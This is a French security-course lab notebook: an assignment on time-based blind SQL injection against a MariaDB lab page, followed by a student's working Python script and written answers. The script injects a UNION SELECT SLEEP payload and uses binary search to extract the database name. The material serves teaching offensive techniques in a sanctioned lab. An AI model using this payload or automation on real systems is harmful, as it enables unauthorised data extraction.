# ipl I317B Sécurité : labos
## Projet 1 : exploitation SQL à l'aveugle

Pour ce premier projet (qui originellement était le dernier exercice de la semaine 3), vous allez procéder à des injections à l'aveugle. En effet, la page suicitant notre intérêt pour ce projet ne contient pas grand chose à part un bouton ... mais elle est injectable (promis) !

http://labosecuipl.alwaysdata.net/20/s03/ex2/


Cette fois-ci, le moteur de base de donnée présent derrière ce site n'est plus du sqlite mais du MariaDB. Votre objectif pour ce projet est de récupérer le nom de la base de donnée.

1. Premièrement, vous devrez analyser ce site pour trouver où faire votre injection. Comme l'indique le nom de ce projet, votre injection sera à l'aveugle, vous ne devez donc pas vous attendre à percevoir le moindre résultat pour celle-ci, aucune valeur présente sur le site ne dépend de la réusite de votre injection (par exemple: oui, la couleur du titre est *vraiment* aléatoire).  
   Pour vous aider dans votre démarche, voici quelques *gros* indices :
  - MariaDB dispose d'une fonction sleep ( https://mariadb.com/kb/en/sleep/ ) qui va faire "dormir" le code un certain nombre de seconde. La base de donnée mettra donc plus de temps avant de retourner un résultat.
  - SQL, comme d'autres langages, fait une évaluation paresseuse (lazy) des conditions. Celles-ci sont évaluée de gauche à droite et si la logique booleen le permet, les parties inutiles sont ignorées.  
    > L'exemple suivant est en python mais le comportement SQL est le même :
    > - `if False and 1/0:` ne créera pas d'exception malgré la présence d'une division par zéro.
    > - `if True and 1/0:` créera une exception `ZeroDivisionError`.
    >  
    > En effet, dans le premier cas, le résultat de `Faux ET ?` sera toujours faux ([logique booléen](https://fr.wikipedia.org/wiki/Alg%C3%A8bre_de_Boole_(logique)#Conjonction)), il n'est donc pas nécessaire d'évaluer la suite de l'expression et python ne "voit" donc même pas la division par zéro.
    > 
    > Dans la deuxième expression `True ET ?`, toute l'expression dépend de ce qui se trouve après le `ET` et donc la suite de l'expression doit être évaluée.

2. Une fois l'injection trouvée et fonctionnelle, vous devrez coder un programme qui recherchera le nom de la base de donnée (voir: https://mariadb.com/kb/en/database/ ).  
   Au vue du type d'attaque que vous allez mener (ralenti par les `sleep`) et le nombre d'étudiant (pauvre serveur), je vous demande de coder intelligemment :
  - Un des buts évalué de ce projet est de réduire le nombre de requêtes nécessaire pour obtenir le résultat par exemple avec une [recherche dichotomique](https://fr.wikipedia.org/wiki/Recherche_dichotomique).
  - Un temps de sleep entre 2 et 5 secondes devrait être suffisant dans la majorité des cas (à moins que vous n'ayez une connection internet particulièrement instable).
  - (...)

  Afin d'aiguiller votre recherche, nous partons du postula que le nom de la base de donnée à trouver ne comprend que des charactères repris dans `[a-z0-9]` ainsi que le tiret `-` et le tiret du bas `_`. (Attention le tiret du bas à une [valeur particulière](https://www.w3schools.com/sql/sql_wildcards.asp) dans le `LIKE` sql.)
3. En plus du code du point précédent, vous rédigerez quelques lignes de texte pour décrire :
  - la localisation de la vulnérabilité et la requête SQL supposée derrière (La question classique "Qu'est-ce qui tourne derrière ?").
  - le format de votre injection.
  - d'éventuelles difficultées rencontrer pendant ce projet.
  
  Ce texte peut être présenté dans une cellule de type Markdown de votre jupyter notebook.

Le format de remise préféré est un jupyter notebook mais vous pouvez également fournir un fichier "*.py*" plus un *pdf* pour la partie textuelle.

La date de remise sur moodle est le dimanche 25 octobre à 23H59.

...

In [14]:
import requests
import time

In [15]:
"""
Fait une requete post pour voir si le caractère est {=, > ,<} au caractère dans la base de donnée à la position donnée
"""
def requestPost(caractere, position, comparateur):
    timeBeforeRequest = time.time()
    sqli = " '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), %s, 1) %s '%s' ;--" %(
        position, comparateur, caractere)
    page = requests.post(
        "http://labosecuipl.alwaysdata.net/20/s03/ex2/",
        data={
            "id": sqli}
    )
    timeAfterRequest = time.time()
    if (timeAfterRequest - timeBeforeRequest > 3):
        return True
    else:
        return False
    
#requestPost('l', str(1), '=')

In [16]:
"""
Renvoie la position; 'a' représente le début de la liste et 'b' la fin de la liste, 'm' le milieu
"""
def recherche_dichotomique(liste_de_donnee, position, a, b):
    if b >= a:
        m = (a+b)//2
        if (requestPost(liste_de_donnee[m], position, '=')):
            return m
        elif (requestPost(liste_de_donnee[m], position, '<')): # le char est plus grand
            return recherche_dichotomique(liste_de_donnee, position, a, m-1)
        #elif (requestPost(liste_de_donnee[m], position, '>')):
        else:
            return recherche_dichotomique(liste_de_donnee, position, m+1, b)
    else:
        return -1
    

In [17]:
# du plus petit char au plus grand
dictionnaire = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f',
                'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'x', 'w',
                'y', 'z', '-', '_']
resultat = ""
position = 1

debut = time.time()
print("en cours...")
while 1:
    res = recherche_dichotomique(dictionnaire, str(position), 0, len(dictionnaire)-1)
    if (res != -1):
        resultat += dictionnaire[res]
        position += 1
        print(dictionnaire[res], end='')
    else:
        break

fin = time.time()
print("\n")
print("Fin ! temps mis: ", fin - debut)
print("résultat :", resultat)


en cours...
labosecuipl_p01_blind

Fin ! temps mis:  182.41846561431885
résultat : labosecuipl_p01_blind


Question 1 :

La vulnérabilité se trouve dans un input qui est caché, c'est-à-dire qu'on ne le voit pas sur la page. Pour le voir il suffit d'inspecter le code source de la page et on aperçois bien l'input caché. L'input reçoit une valeur random, un id. Quand j'analyse les requêtes réseau, je remarque qu'il y a une requête POST qui est effectuée et que l'id qui est dans l'input est envoyé avec pour effectuer une requête SQL à une base de donnée. La requête à la base de donnée que j'ai déduis est la suivante :

    SELECT <???> FROM <???> WHERE id=<id>
    

Question 2:

Après avoir identifier la vulnérabilité, j'ai pu essayer plusieurs injection SQL avant de trouver la bonne. A savoir que la page n'affiche rien de la base de données du coup il n'y a rien de visuel pour nous dire si l'injection SQL a fonctionnée. Mais il existe une fonction en SQL qui permet de faire dormir le code : sleep(x). 
J'ai utiliser cela pour voir si mon injection était bonne. 
Le format de mon injection SQL est la suivante
    
    " '' UNION SELECT SLEEP(3) WHERE SUBSTRING(DATABASE(), <position caractère>, 1) < '>' ou '<' ou '=' >            '<caractère>' ;--"
    
ce qui donnera le tout attaché: 
   
   SELECT <???> 
   FROM <???> 
   WHERE id= '   ' 
   UNION 
   SELECT SLEEP(3) 
   WHERE SUBSTRING(DATABASE(), <position caractère>, 1) < '>' ou '<' ou '='> '<caractère>';--
   
L'id peut être aussi un nombre, n'importe lequel, ça n'a pas d'importance même si le premier select ne renvoie pas de résultat le deuxième sera fait sans problème. Ce qui compte c'est le matching du nombre de colonne. Ici il y en a une de part et d'autre.

Question 3:

Je n'ai pas rencontré personellement de problème durant ce projet. Une fois la bonne injection SQL trouvée il était assé simple de trouver le nom de la base de donnée.